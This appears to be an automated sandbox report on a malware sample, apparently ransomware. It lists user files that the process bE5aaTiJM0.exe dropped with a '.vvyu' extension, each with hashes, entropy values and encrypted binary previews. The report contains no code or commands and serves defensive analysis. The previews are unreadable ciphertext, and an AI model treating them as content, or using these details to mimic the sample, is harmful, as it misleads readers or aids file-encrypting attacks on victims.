Preview:	NVWZAid...m.'....(.....o]..o..5..i....T..kim....%......5.DA..W1...d.P..R8f8.;S?......G.,..I....q..)^....,........."..u..r....c.\..~.x.xcQ.).y......gb.YP..1_}.K.......9...K.0...{._r. q...HP.`.......S..<t...!.X..u......^-..f........mS..........Q..........kK.....q"u...e.@'........n....I.$......%X$..`.......W.DU..L.............e.<.N.&..{........h......<=s.DwX..f..V.2...d(....w..9p+d..K.."..Z.f....C..kj.!BS....8P.b=..d... .....A/_@.(.sD.GX.U..y........V..Td..^........G.~..{z.RpFAs.F.MG`.T{...._.s...A.Z..Z...7....p...#.VT.....I.....\|Nv.A.y#-.._...~...'>.l.,.V+=I.....<j.y)g.B...a...n..?^..h...8...6.,..`d...?Fa'B.z.\7$.$.+..zP.K....J..p\|P..Q.7nq.H&...M...$.&4.8.....(0w.$... K._6..u.?1.m....u}H.........3.\|(;YvO...U..M.....G.RE4..M#...E.g......+.@..O,G....f.9.b!N........1+}..6.&F?.$7.C7..j....\|..&..H<'.J.H+ .T.....M.!.!.m.R6C->[l...2...J).o.)...*....ZJ.r...m.#.u.....0_A...eQP...P...i1^a...\|.d..G..>sZe.#.CD7F6...VX.x..M=..._....=.:.8u........

C:\Users\user\Desktop\NVWZAPQSQL.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8320368011799175
Encrypted:	false
SSDEEP:	24:FxpNaiRfJVp7raugT2O+MQpI070kcwfzU9pQRt46ti6srndD71PmhmcfLeuTdYX4:FPNaCx/7OnHHHS0kvQ9pEtBFsrd/1PeR
MD5:	8817F49667E8A89EE064CE48F8A5E2B1
SHA1:	C1C47681282926A7FCC05F27B60C456FAC6759E2
SHA-256:	B360C9F37D9BFC0E3770FE26CA965A38AEC226ED82207B68A6CD7C205A0119A3
SHA-512:	0DD35AC49DE004A9B0DC7F036E3CEA97DFC3690319B4E93A15BA4C42285C1F02CE5BB8951911F0EF55BC8E26270C22E6649A7D821F333FC7B26CA44A65365D59
Malicious:	false
Preview:	NVWZA...Q. ..0j.h.r....p.....Q..'...3(Z.y7.8.pq..b....".......\|..44....'$..DwsCO.....IP.A.o\.2;.G},..k.C....W....q=m......^y.tr^.j...=.y.Aid\W.....{i.06......2..&....\.V.JZ.n...mO.cM..?......,.....Vl..F.EM..x\|.k.>\|_...,I..+.....X.t.n...#(..f.Y..2SY$..@.....MTS.%WA........". .0o....Lz.H..!...%..,A.O..0'.tG.+..Z...<R...\t...#.9.N6..9........._.\....rS..G.ps...Hc\|J.....['5..G..sv.....b..v:.v=..=.1..x2U....\Ty[o...P.?...Z.%N ..#.W.5.>..3..P...R...1.s...~....I/.o.#Q2......b.i..:.7J.\....r..y...e..w.<.[~7.g\|...[.........b..w.E...W.......;.W1.r._;....=<j9.....n./.;W.I.a.G....Y............k.+r..([mC...].4..w.I...?..~n...HMi2..M2..[...sS.{pj......(.`..l.^..$.<...8./....~..9..+.YS......7_..~..C'x..B;nX].i............E.xl.D~+.f".p......_.-..`...3.z..1.9...R..1.....j.$.J..N~E.X.h:...?0......\|..6.0'......["D.r.X......I..=s..2.p.......aB...)...^..-.....LE.E0....~3.V..0J..A.8v...~...9..>H..A.C......#.3t+~S;dEy....R.+..H....]..v.;.W.e...##....(..j..E.r

C:\Users\user\Desktop\NVWZAPQSQL.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8320368011799175
Encrypted:	false
SSDEEP:	24:FxpNaiRfJVp7raugT2O+MQpI070kcwfzU9pQRt46ti6srndD71PmhmcfLeuTdYX4:FPNaCx/7OnHHHS0kvQ9pEtBFsrd/1PeR
MD5:	8817F49667E8A89EE064CE48F8A5E2B1
SHA1:	C1C47681282926A7FCC05F27B60C456FAC6759E2
SHA-256:	B360C9F37D9BFC0E3770FE26CA965A38AEC226ED82207B68A6CD7C205A0119A3
SHA-512:	0DD35AC49DE004A9B0DC7F036E3CEA97DFC3690319B4E93A15BA4C42285C1F02CE5BB8951911F0EF55BC8E26270C22E6649A7D821F333FC7B26CA44A65365D59
Malicious:	false
Preview:	NVWZA...Q. ..0j.h.r....p.....Q..'...3(Z.y7.8.pq..b....".......\|..44....'$..DwsCO.....IP.A.o\.2;.G},..k.C....W....q=m......^y.tr^.j...=.y.Aid\W.....{i.06......2..&....\.V.JZ.n...mO.cM..?......,.....Vl..F.EM..x\|.k.>\|_...,I..+.....X.t.n...#(..f.Y..2SY$..@.....MTS.%WA........". .0o....Lz.H..!...%..,A.O..0'.tG.+..Z...<R...\t...#.9.N6..9........._.\....rS..G.ps...Hc\|J.....['5..G..sv.....b..v:.v=..=.1..x2U....\Ty[o...P.?...Z.%N ..#.W.5.>..3..P...R...1.s...~....I/.o.#Q2......b.i..:.7J.\....r..y...e..w.<.[~7.g\|...[.........b..w.E...W.......;.W1.r._;....=<j9.....n./.;W.I.a.G....Y............k.+r..([mC...].4..w.I...?..~n...HMi2..M2..[...sS.{pj......(.`..l.^..$.<...8./....~..9..+.YS......7_..~..C'x..B;nX].i............E.xl.D~+.f".p......_.-..`...3.z..1.9...R..1.....j.$.J..N~E.X.h:...?0......\|..6.0'......["D.r.X......I..=s..2.p.......aB...)...^..-.....LE.E0....~3.V..0J..A.8v...~...9..>H..A.C......#.3t+~S;dEy....R.+..H....]..v.;.W.e...##....(..j..E.r

C:\Users\user\Desktop\NVWZAPQSQL\BJZFPPWAPT.xlsx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837089500473537
Encrypted:	false
SSDEEP:	24:jvqC7b5bOkLiQ+8YatvReELsZhkNwyp6JmfmSK5Wgilvj+oMX4ajkKUsbD:jvqCv5ykB+KHpKmO55sLEILmD
MD5:	829E11D51219DE72426D9C9EB825EA96
SHA1:	545C7003AEBCD9041A582DFB42994F68F84D736C
SHA-256:	AE55A3CA0F01679C42FC84066ABACD229A4F88D223B77DDB241222902FB14E7C
SHA-512:	21C0921D52FAD3B642CFB42EE9A4493181C8702B4C7187689A95DB5A50442935EA42D7F82530DC77DC8F6E842E72817185AB0669D40508BA3633D72E02D5C2EB
Malicious:	false
Preview:	BJZFP%~X....$....?M..\..G.Z..,.Jx.z/8....._.,.fl.R..b.Jm......$P.......Sc..@.a_...(.JB..z.X.y...N.p.I..Z..Q..../.^}n..4.9.V..\&1..2Y.c2=.W.G.!..:..Q.}._j....iB...."Z...~..........G....#..B...T..:.%o....6....i3yMa.v......A.0....I.wzU.xfu[..7...!...-H..B.......E.N.`F.......J..+vk.{b8.S..(E.......h>KJ..D..Z2.!.J..........l.80.1...<.pG...._..H).."...T..S.!...q...<.....{l..\|BPL..Y..%..d......u,.w.^..........$#..u.m.g/.W...a...}.=....S.s..$k.a..f .....C?..........#.....+.^.(>..W.....'{.....\u.C&...A......N.......Q..5.=.K.J4>7..L.....~..Hr.].i...m.>.J..&."..^=po...._......$....&.d.gn..z..X.......h....BX..Uk...b..D..:P.........-..4...c._.. .j...1a..@.T...mQ.2.#.nd.+La.".-.8.....#.......5r.&.aK..3....\|........+..N..RbI..........F..F...H..}..m{.%sj....d.b..S.....$.....I.....>c.x..]3.ni....`GU.Z.-.....z....jR>..../.... ...h...L......(.]..~a..`....K..I@!..........T..s..m......}..G....`.....T.&.J\|T.... ..7d..P.D...9y.c..4icc_.h#.....:

C:\Users\user\Desktop\NVWZAPQSQL\BJZFPPWAPT.xlsx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.837089500473537
Encrypted:	false
SSDEEP:	24:jvqC7b5bOkLiQ+8YatvReELsZhkNwyp6JmfmSK5Wgilvj+oMX4ajkKUsbD:jvqCv5ykB+KHpKmO55sLEILmD
MD5:	829E11D51219DE72426D9C9EB825EA96
SHA1:	545C7003AEBCD9041A582DFB42994F68F84D736C
SHA-256:	AE55A3CA0F01679C42FC84066ABACD229A4F88D223B77DDB241222902FB14E7C
SHA-512:	21C0921D52FAD3B642CFB42EE9A4493181C8702B4C7187689A95DB5A50442935EA42D7F82530DC77DC8F6E842E72817185AB0669D40508BA3633D72E02D5C2EB
Malicious:	false
Preview:	BJZFP%~X....$....?M..\..G.Z..,.Jx.z/8....._.,.fl.R..b.Jm......$P.......Sc..@.a_...(.JB..z.X.y...N.p.I..Z..Q..../.^}n..4.9.V..\&1..2Y.c2=.W.G.!..:..Q.}._j....iB...."Z...~..........G....#..B...T..:.%o....6....i3yMa.v......A.0....I.wzU.xfu[..7...!...-H..B.......E.N.`F.......J..+vk.{b8.S..(E.......h>KJ..D..Z2.!.J..........l.80.1...<.pG...._..H).."...T..S.!...q...<.....{l..\|BPL..Y..%..d......u,.w.^..........$#..u.m.g/.W...a...}.=....S.s..$k.a..f .....C?..........#.....+.^.(>..W.....'{.....\u.C&...A......N.......Q..5.=.K.J4>7..L.....~..Hr.].i...m.>.J..&."..^=po...._......$....&.d.gn..z..X.......h....BX..Uk...b..D..:P.........-..4...c._.. .j...1a..@.T...mQ.2.#.nd.+La.".-.8.....#.......5r.&.aK..3....\|........+..N..RbI..........F..F...H..}..m{.%sj....d.b..S.....$.....I.....>c.x..]3.ni....`GU.Z.-.....z....jR>..../.... ...h...L......(.]..~a..`....K..I@!..........T..s..m......}..G....`.....T.&.J\|T.... ..7d..P.D...9y.c..4icc_.h#.....:

C:\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.pdf

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843141732634156
Encrypted:	false
SSDEEP:	24:bgAZgbWuujxTT98VhEXZ/krAxbBKNWH8A/tHm+CajmDggvP4oyCSazwKeF4BUtwh:lgqZTZsEp/31/H8A/WakgRuzwKowbSmD
MD5:	036B9EA7C4CA7B0B13383D5CD862ABF5
SHA1:	3A70520161C86CB2643A471D65F3AE46915978AA
SHA-256:	0AF107B45ED4B0DBE6FD9014FFDC82673E06A95092828C48E175C8F40DE153C6
SHA-512:	1860E25476CCC5DF1A7DD0ED5080A204CDFBDD2330EF365108B8EC6E1AE00FE8E9158F1CDCB8DB4C48B9800ABB769D2589464E5016E38A97CBAC11EA1A4DBB8C
Malicious:	false
Preview:	EOWRV.v{M.......7_...C.K.8.7.=.H.V/.$.J......M1.3..u..........Nv.f..l.J....J-R..Y\|(........tv.......S';;>...{o.D....yG.+w..#.\|A{n.L.y..].._p.......C..x;$2v.....{..1...S4...... ..........Y.l(5.;!..o..H..EH...kU$../g[..q..v\|...K.A..x..^.sJ.m.u.......L.@dD..........xyu$.DK...=X..zhnP.r.@...0G..2.7....,.H.v.M'.h..Es.9E.....>8....v##L..... ..?:".....6JZ.c..B.c...x.l..Y.o...xqZ/NNY.....yO.'J;KB...%n.z._.E.:......;,...4&J..w..d..0.QE.i$..m..!1...K...d..g.!..P.e..F...z.%s.E.z.'W...b.$`D.V..O......xFs.8L......`....#.!VB....B...............h........E1..O.D.v.M..Y..."E........1.....A-.t...F....j?-w.....<F:..k....zxS.........v....a.)ZmZ..a1u.o...8E....ea..l.#..........nI......K.o.z.......@<.vG......P+...3..0.#S.b.....-.%....Q....a7...).d....:....J)Wc..]..<F6..G3t..D.W..)......dQ.f.q.....V[.+....#..]Os.#......f.)G.....'b....K.`...j.../U....v_.."Z...^.;..M.X..?...m..h.r/....n...=).%I.).U.<c.=.;U.....Z...._n...7.......n=/.../.k=`.-.m...H....w.i.Q`D.f...

C:\Users\user\Desktop\NVWZAPQSQL\EOWRVPQCCS.pdf.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.843141732634156
Encrypted:	false
SSDEEP:	24:bgAZgbWuujxTT98VhEXZ/krAxbBKNWH8A/tHm+CajmDggvP4oyCSazwKeF4BUtwh:lgqZTZsEp/31/H8A/WakgRuzwKowbSmD
MD5:	036B9EA7C4CA7B0B13383D5CD862ABF5
SHA1:	3A70520161C86CB2643A471D65F3AE46915978AA
SHA-256:	0AF107B45ED4B0DBE6FD9014FFDC82673E06A95092828C48E175C8F40DE153C6
SHA-512:	1860E25476CCC5DF1A7DD0ED5080A204CDFBDD2330EF365108B8EC6E1AE00FE8E9158F1CDCB8DB4C48B9800ABB769D2589464E5016E38A97CBAC11EA1A4DBB8C
Malicious:	false
Preview:	EOWRV.v{M.......7_...C.K.8.7.=.H.V/.$.J......M1.3..u..........Nv.f..l.J....J-R..Y\|(........tv.......S';;>...{o.D....yG.+w..#.\|A{n.L.y..].._p.......C..x;$2v.....{..1...S4...... ..........Y.l(5.;!..o..H..EH...kU$../g[..q..v\|...K.A..x..^.sJ.m.u.......L.@dD..........xyu$.DK...=X..zhnP.r.@...0G..2.7....,.H.v.M'.h..Es.9E.....>8....v##L..... ..?:".....6JZ.c..B.c...x.l..Y.o...xqZ/NNY.....yO.'J;KB...%n.z._.E.:......;,...4&J..w..d..0.QE.i$..m..!1...K...d..g.!..P.e..F...z.%s.E.z.'W...b.$`D.V..O......xFs.8L......`....#.!VB....B...............h........E1..O.D.v.M..Y..."E........1.....A-.t...F....j?-w.....<F:..k....zxS.........v....a.)ZmZ..a1u.o...8E....ea..l.#..........nI......K.o.z.......@<.vG......P+...3..0.#S.b.....-.%....Q....a7...).d....:....J)Wc..]..<F6..G3t..D.W..)......dQ.f.q.....V[.+....#..]Os.#......f.)G.....'b....K.`...j.../U....v_.."Z...^.;..M.X..?...m..h.r/....n...=).%I.).U.<c.=.;U.....Z...._n...7.......n=/.../.k=`.-.m...H....w.i.Q`D.f...

C:\Users\user\Desktop\NVWZAPQSQL\EWZCVGNOWT.jpg

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.819413342270568
Encrypted:	false
SSDEEP:	24:ou8FRwhc4dB6AM60CF8cNHFVVRco4tcdMDL4Msqt1WUqivrpvCtaw8WssbD:oAXdpyCFnVBdMIMvE8B6UXmD
MD5:	43DE28D45DF0D1A11890727C30E6445B
SHA1:	E76E4361E1BDF4AA82A88ED0B58550142A458DA9
SHA-256:	290699843F51093723E31DDD160D33F2AF981524AA846CE4FF25E7FE5E1A0179
SHA-512:	A0CDE301EBA127729A4725EAA42B3875A5576C25A3188DA43C7297758B32B82EEDD053A5412A8702BA18F1C4B489B15C8C0124CC8011CC9E196297FC0401B6A4
Malicious:	false
Preview:	EWZCV.5.Z..E..l.C.....5...[l\|.W8b..l. .~....wkY.....%"y..?dY.=\|.c&Y.D5/m.z.YZ..\....3...^.ol..t.6........x....t.G..q.j..6+6.......y.....P.....p&g..V..l..=.S.?f.A.....T.6..@\|.....{m..S.\|.s.w.Lp..:.X..R3.1. \..-&.b...D....."..uE..e..+\|.a..^.......UDd.JtTh.r..!y.].!..N#E..N!OO...x?.#..8,B..W..S0.o.e.$.5.xL...%.&Q..F.`~"1.Q`.s.....Y.>..24.'6)N.69DA...1.B..&`.@....U..._.s<.r".%.@}v.-$.A........I1.A.11.?..T...'aP._!.\|...zDjZ._?..Y..J....R".W...Z./.r5.d....<.\|....zC$..l....m.&....;~....,.....xV....t..]5.sy.....w.r.V.e.8.....B....4l\|I.N^i`4....J..;...:..9...Ra.w..^..}c.w.+.o..2lhJ.....>.A..FF....L.>26)..==.....C.H......[GH!..V...K...r..L.c..?.....~r7;@............3.../..g..#K.!.5.....7.......<.m...bM....m..xA.H.]nSi.l....5..i...$.8..?.X.T1.A.L7.{ ............LB..mX.......D.v..So...}....l.Th.qL.V..p.\|...~...X`.:..6<.OZ ..)W...\|5.Qn1T..7V.J...yDu..:.R]...=....Rc..!.......S..."....>E@.E.....x)...C.. ?.zh.L.q..!.{O...cT..oU.;@l.f..K.?o..M.Slz

C:\Users\user\Desktop\NVWZAPQSQL\EWZCVGNOWT.jpg.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.819413342270568
Encrypted:	false
SSDEEP:	24:ou8FRwhc4dB6AM60CF8cNHFVVRco4tcdMDL4Msqt1WUqivrpvCtaw8WssbD:oAXdpyCFnVBdMIMvE8B6UXmD
MD5:	43DE28D45DF0D1A11890727C30E6445B
SHA1:	E76E4361E1BDF4AA82A88ED0B58550142A458DA9
SHA-256:	290699843F51093723E31DDD160D33F2AF981524AA846CE4FF25E7FE5E1A0179
SHA-512:	A0CDE301EBA127729A4725EAA42B3875A5576C25A3188DA43C7297758B32B82EEDD053A5412A8702BA18F1C4B489B15C8C0124CC8011CC9E196297FC0401B6A4
Malicious:	false
Preview:	EWZCV.5.Z..E..l.C.....5...[l\|.W8b..l. .~....wkY.....%"y..?dY.=\|.c&Y.D5/m.z.YZ..\....3...^.ol..t.6........x....t.G..q.j..6+6.......y.....P.....p&g..V..l..=.S.?f.A.....T.6..@\|.....{m..S.\|.s.w.Lp..:.X..R3.1. \..-&.b...D....."..uE..e..+\|.a..^.......UDd.JtTh.r..!y.].!..N#E..N!OO...x?.#..8,B..W..S0.o.e.$.5.xL...%.&Q..F.`~"1.Q`.s.....Y.>..24.'6)N.69DA...1.B..&`.@....U..._.s<.r".%.@}v.-$.A........I1.A.11.?..T...'aP._!.\|...zDjZ._?..Y..J....R".W...Z./.r5.d....<.\|....zC$..l....m.&....;~....,.....xV....t..]5.sy.....w.r.V.e.8.....B....4l\|I.N^i`4....J..;...:..9...Ra.w..^..}c.w.+.o..2lhJ.....>.A..FF....L.>26)..==.....C.H......[GH!..V...K...r..L.c..?.....~r7;@............3.../..g..#K.!.5.....7.......<.m...bM....m..xA.H.]nSi.l....5..i...$.8..?.X.T1.A.L7.{ ............LB..mX.......D.v..So...}....l.Th.qL.V..p.\|...~...X`.:..6<.OZ ..)W...\|5.Qn1T..7V.J...yDu..:.R]...=....Rc..!.......S..."....>E@.E.....x)...C.. ?.zh.L.q..!.{O...cT..oU.;@l.f..K.?o..M.Slz

C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85915626230839
Encrypted:	false
SSDEEP:	24:FVj6nZ1oTnvk1YORoHfl5gWnTo8ieH6MlhglAackY2Q31psTVe5eIBsbD:FV+wvk1YORUfl5jaMl0Y2KsTQ5BmD
MD5:	CAD4821C2091381B7221BF4C912F79F5
SHA1:	46EE8971A190D5B29D37AB7082BF2B5F070060F8
SHA-256:	9D09AB8ECC907AC1B1FAB3C186376FF1C1884C8E673C488F7DCF2C5D28DA937E
SHA-512:	146DD16DA54AB2E53D3B8D81DC523BFA679BDC31ECDC375D8F1B233D39FE92B9CAEF6794FB06154695AE0C952218BCF9C23485BF4793CF2C32F8C3692661E8C1
Malicious:	false
Preview:	NVWZA...3...a9...w...z..`.In..or>...:..~..{...@.%.....s&.i.S......Q.....v.5..K9z.sW.'.....l...A]h...O..4.,h...+I...OMw.+n.....!]I.....~..R#..Np.L4V...........I=.."6'#]F.(..!..}..2...J.K.......w$GC{...).HE...D...l...>M.#..o...> .,..B..a....^..rq&+......$...... ...!k.p.C...7F%C.........m0.-o.c.......9(r3...H:.i...P....ilei.2].l4T..v.0.0..\...H.T2.....<<-....<...-.K..D.....+H...em.B..r...!....@.Z!..s...G...3&.[p..F...5.....@..(.l5o..\|k]...K.Qb....wr.k.Y..9..%j..0~..L/...a.+.......7.PrFq....._....x.<8Q.g6..Q.."....h..)...(.&..j.Fg..1(0q.%.(..\..P.....r..g.P.q.......K...u.1/...x.mX...k..t...+Ts..kN.3.u..$........+..>.$..V.ia.n..$.g.}.D....d..k.x..l((...P)....-/5n\|......?...0.(...p......!fJqr.....q.p5?w{..L..-.4.C..\|Os.W.p..<.Te.d.ry..V......#R....\...b...xR9.@..^...`..u>..4a......N....o_.D..}.{..s.....M.."Q.8....kQ.....C'.2.m..uzG.g.8.?<..1-.'.!.fN.....@....a...n.Uf .(....u9.A.. ..PJ.6W._....D1I.....K...[M...uH>.........\|R\0...X.K/6F.d._...

C:\Users\user\Desktop\NVWZAPQSQL\NVWZAPQSQL.docx.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.85915626230839
Encrypted:	false
SSDEEP:	24:FVj6nZ1oTnvk1YORoHfl5gWnTo8ieH6MlhglAackY2Q31psTVe5eIBsbD:FV+wvk1YORUfl5jaMl0Y2KsTQ5BmD
MD5:	CAD4821C2091381B7221BF4C912F79F5
SHA1:	46EE8971A190D5B29D37AB7082BF2B5F070060F8
SHA-256:	9D09AB8ECC907AC1B1FAB3C186376FF1C1884C8E673C488F7DCF2C5D28DA937E
SHA-512:	146DD16DA54AB2E53D3B8D81DC523BFA679BDC31ECDC375D8F1B233D39FE92B9CAEF6794FB06154695AE0C952218BCF9C23485BF4793CF2C32F8C3692661E8C1
Malicious:	false
Preview:	NVWZA...3...a9...w...z..`.In..or>...:..~..{...@.%.....s&.i.S......Q.....v.5..K9z.sW.'.....l...A]h...O..4.,h...+I...OMw.+n.....!]I.....~..R#..Np.L4V...........I=.."6'#]F.(..!..}..2...J.K.......w$GC{...).HE...D...l...>M.#..o...> .,..B..a....^..rq&+......$...... ...!k.p.C...7F%C.........m0.-o.c.......9(r3...H:.i...P....ilei.2].l4T..v.0.0..\...H.T2.....<<-....<...-.K..D.....+H...em.B..r...!....@.Z!..s...G...3&.[p..F...5.....@..(.l5o..\|k]...K.Qb....wr.k.Y..9..%j..0~..L/...a.+.......7.PrFq....._....x.<8Q.g6..Q.."....h..)...(.&..j.Fg..1(0q.%.(..\..P.....r..g.P.q.......K...u.1/...x.mX...k..t...+Ts..kN.3.u..$........+..>.$..V.ia.n..$.g.}.D....d..k.x..l((...P)....-/5n\|......?...0.(...p......!fJqr.....q.p5?w{..L..-.4.C..\|Os.W.p..<.Te.d.ry..V......#R....\...b...xR9.@..^...`..u>..4a......N....o_.D..}.{..s.....M.."Q.8....kQ.....C'.2.m..uzG.g.8.?<..1-.'.!.fN.....@....a...n.Uf .(....u9.A.. ..PJ.6W._....D1I.....K...[M...uH>.........\|R\0...X.K/6F.d._...

C:\Users\user\Desktop\NVWZAPQSQL\NYMMPCEIMA.mp3

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851088767144356
Encrypted:	false
SSDEEP:	24:bzqSnISNeLIQjgp4NYuijz5A945C1JyqGxy3jOOsbD:bzqSnXNeLIQcjq+9YmD
MD5:	F9FFE4DF478CB248DA9736C2CDA321D7
SHA1:	E2501D852E0DB72B3AB789E05D66A77E36754223
SHA-256:	A58BB082C8A135BA3CE5570BAAC66D5881A3312B1FB6828371CEA0A24EBB0F77
SHA-512:	C7ABF366DDC09C531A130BCE85FDF050F92AE3BEE7169FE6C2A4881C1FD0A10CCBC494F10A83D568F5C2B3FDFD2C297CCC3A244D438DC818DE2EAD353BB46D94
Malicious:	false
Preview:	NYMMP...")....ly....{...-.l~....Ol......>r.8..E.....z...3...Xw...V...X.J...2..X...q.!.}.L.h.o.H...l_.4...q..].g.'\|....#.)V\|.4u2..sqHX.+...l.....1.v.y{E.a\/.......M..'CFFf>.U...>............3>>..[.F..'.K.LU.]...&d..ht.s.B......s.<....@.(.e/a.3..-uJ......%..F. ...@_\.. ....c.[..`A#..3@.....%.~.7...b..a.K.F..S......+z.aE~.N...f..S..n....!g..'.l.HR...=.F..@.-.0....H.1'j}....T\|].i...........j\|.,..o./.tb...{...sE]....../..YH_.K........^..L...p...5.)....rrC.R...`.Qv.t......(.c.2..Q...1k.yqG.q.......=>)..pT..z....Bf]................-.DJR...7.B.9..}......>&qJ...-"/9.f....1.o.g...A...qc...$K.P.gO.4..et..:..jy?.#....9.$.BXB&....... iV..Xw.....V ..5.K(..m.`.v..i....DEm..]...N9.^..D..&......1..q4cjg4e.I.......;v....G.;S......l...!\|.....+..r.iM......K.>..D..Q...A......p..z:S.5.]M...!4h@......{....s.....o..@y..g...%.$.....,...Px.O\|PNRR.XuF....{.6....j....x]...=".x...MG..rs.?._e.j..[..K.....A.]q-.....3...9.+.E/..e.gj.[:.Yf*jvC+%u...u.\.l\[%.M.....r....

C:\Users\user\Desktop\NVWZAPQSQL\NYMMPCEIMA.mp3.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.851088767144356
Encrypted:	false
SSDEEP:	24:bzqSnISNeLIQjgp4NYuijz5A945C1JyqGxy3jOOsbD:bzqSnXNeLIQcjq+9YmD
MD5:	F9FFE4DF478CB248DA9736C2CDA321D7
SHA1:	E2501D852E0DB72B3AB789E05D66A77E36754223
SHA-256:	A58BB082C8A135BA3CE5570BAAC66D5881A3312B1FB6828371CEA0A24EBB0F77
SHA-512:	C7ABF366DDC09C531A130BCE85FDF050F92AE3BEE7169FE6C2A4881C1FD0A10CCBC494F10A83D568F5C2B3FDFD2C297CCC3A244D438DC818DE2EAD353BB46D94
Malicious:	false
Preview:	NYMMP...")....ly....{...-.l~....Ol......>r.8..E.....z...3...Xw...V...X.J...2..X...q.!.}.L.h.o.H...l_.4...q..].g.'\|....#.)V\|.4u2..sqHX.+...l.....1.v.y{E.a\/.......M..'CFFf>.U...>............3>>..[.F..'.K.LU.]...&d..ht.s.B......s.<....@.(.e/a.3..-uJ......%..F. ...@_\.. ....c.[..`A#..3@.....%.~.7...b..a.K.F..S......+z.aE~.N...f..S..n....!g..'.l.HR...=.F..@.-.0....H.1'j}....T\|].i...........j\|.,..o./.tb...{...sE]....../..YH_.K........^..L...p...5.)....rrC.R...`.Qv.t......(.c.2..Q...1k.yqG.q.......=>)..pT..z....Bf]................-.DJR...7.B.9..}......>&qJ...-"/9.f....1.o.g...A...qc...$K.P.gO.4..et..:..jy?.#....9.$.BXB&....... iV..Xw.....V ..5.K(..m.`.v..i....DEm..]...N9.^..D..&......1..q4cjg4e.I.......;v....G.;S......l...!\|.....+..r.iM......K.>..D..Q...A......p..z:S.5.]M...!4h@......{....s.....o..@y..g...%.$.....,...Px.O\|PNRR.XuF....{.6....j....x]...=".x...MG..rs.?._e.j..[..K.....A.]q-.....3...9.+.E/..e.gj.[:.Yf*jvC+%u...u.\.l\[%.M.....r....

C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.png

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.82735391969792
Encrypted:	false
SSDEEP:	24:idb734VJhV7t+K0M1/Xs9JghNy1t7XwsDScdZy884toHRWP2+m1ThG8rwy8sbD:VZ7t+lEfxhNGtDDScdZy81cTHG8rn8mD
MD5:	7F5514F99D8EE16A146F756912B558E5
SHA1:	EDE3D5D70B7C25C66FD9F5F3E50FCF3CCCDDC056
SHA-256:	27BFC858C1B0B059BAC265F5D1D9ABA288C5CB1EFE552B9618C1541842186574
SHA-512:	98B0A2341F3DF766EA5907C947A6FA0B5C78F41722E9761E5E858E7E25AF83D0D6FA806CAB0E09D8D66472BC09147E3D43B6BBB7742516BE34D0EF5FC3B4110E
Malicious:	false
Preview:	TQDFJ...@...j..v..R@k.f?.;d9...;..\C.H.x,......H.....d>nAO..A.C............:`).mp8N.K@.<.l.8..;.%-.....8.r.....b:..%.....\i.Y..p'.0..k_.....oC...6\|......N...>[qx..........[..".{.......2$....Y.e.9..y.%c5G...p.6Xn..E..j.qA7&.....>.Em..\|1....i....}.J..U..p.H.hF...4.H..!C<0........aLo ..Hr.SR.......Hp....).....V&_.OU..s..u'j.EBLTd.w3..\|.I..1G....La..8.!S.....0.......GgH.$.P?Y.!...w.N6..y..Q..TR.W..L..G..()3UO.h.h...wT...t-..Sa>..S_%.1....../.....:.7...i..1{.#1....x.......q.A_)\aj......o.NL......U.X3..c.>.H.....{.0.f..(....t).g.9.(/5...P.=g..pS+1..tp.Y.......w.......Q.k..-KG.c<.j...u.8^t.[...^i.9.:R...G.^.C..;.z<.3.\V6.'.. .\.'.#..Q....A..o....[.......u.S.?.].X...kdx~\.'...E`"..tA.I..e.\|.M.g!......J.G..4.,m$.q.........%1G-4.<...s....u%q.X@P..p...I.!...@-...u..E]!B"=..&..<@T.h..y.-....E..r[.....~7...'..{_o.il,..w...$..H...\|.2.......A.D.W...A...1S.....L.N......;.o5.=K.5.`H....&..^.....7....5.....rk..*....B...u..[.8C.s@...B 